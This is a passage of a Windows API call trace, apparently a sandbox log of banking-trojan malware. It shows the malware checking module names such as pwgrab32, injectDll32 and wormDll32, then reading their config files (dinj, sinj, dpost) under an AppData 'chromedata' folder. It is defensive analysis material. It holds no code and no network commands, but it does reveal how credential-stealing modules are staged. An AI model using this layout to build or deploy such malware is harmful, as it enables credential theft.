	[0245.124] CloseHandle (hObject=0x66c) returned 1
	[0245.124] CloseHandle (hObject=0x6ec) returned 1
	[0245.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778758
	[0245.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1858) returned 1
	[0245.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778190
	[0245.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0245.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311738
	[0245.124] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0245.124] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0245.124] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0245.125] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0245.125] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0245.125] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0245.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311738) returned 1
	[0245.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1858) returned 1
	[0245.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1840) returned 1
	[0245.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0245.125] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0245.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0245.125] Sleep (dwMilliseconds=0x4e20) 
	[0245.181] Sleep (dwMilliseconds=0x4e20) 
	[0245.218] Sleep (dwMilliseconds=0x4e20) 
	[0245.233] Sleep (dwMilliseconds=0x4e20) 
	[0245.250] Sleep (dwMilliseconds=0x4e20) 
	[0245.265] Sleep (dwMilliseconds=0x4e20) 
	[0245.281] Sleep (dwMilliseconds=0x4e20) 
	[0245.297] Sleep (dwMilliseconds=0x4e20) 
	[0245.313] Sleep (dwMilliseconds=0x4e20) 
	[0245.327] Sleep (dwMilliseconds=0x4e20) 
	[0245.389] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.389] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.389] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.389] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.390] CloseHandle (hObject=0x634) returned 1
	[0245.390] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.390] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.390] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.390] CloseHandle (hObject=0x634) returned 1
	[0245.390] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.390] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.390] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.390] CloseHandle (hObject=0x634) returned 1
	[0245.390] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.391] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.391] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.391] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.391] CloseHandle (hObject=0x634) returned 1
	[0245.391] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.391] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.391] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.391] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.391] CloseHandle (hObject=0x634) returned 1
	[0245.391] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.391] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.391] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.392] GetFileTime (in: hFile=0x634, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.392] CloseHandle (hObject=0x634) returned 1
	[0245.392] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.392] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.392] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.392] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0245.392] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0245.392] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6ec0
	[0245.392] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0245.392] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0245.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0245.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0245.392] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0245.392] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0245.392] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1858, Size=0x10) returned 0x27e1828
	[0245.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0245.393] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1828, Size=0x10) returned 0x27e1858
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0245.393] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1858, Size=0x10) returned 0x27e1828
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0245.393] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1828, Size=0x20) returned 0x2778190
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0245.393] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2778190, Size=0x20) returned 0x2778898
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0245.393] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2778898, Size=0x20) returned 0x2778190
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0245.393] FindNextFileW (in: hFindFile=0x22b6ec0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0245.393] GetLastError () returned 0x12
	[0245.393] FindClose (in: hFindFile=0x22b6ec0 | out: hFindFile=0x22b6ec0) returned 1
	[0245.393] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0245.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.393] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0245.393] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.393] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.393] CloseHandle (hObject=0x634) returned 1
	[0245.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.394] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0245.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.394] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0245.394] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.394] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.394] CloseHandle (hObject=0x634) returned 1
	[0245.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.394] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0245.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.394] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0245.394] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634
	[0245.394] GetFileTime (in: hFile=0x634, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0245.394] CloseHandle (hObject=0x634) returned 1
	[0245.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.394] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0245.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0245.395] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
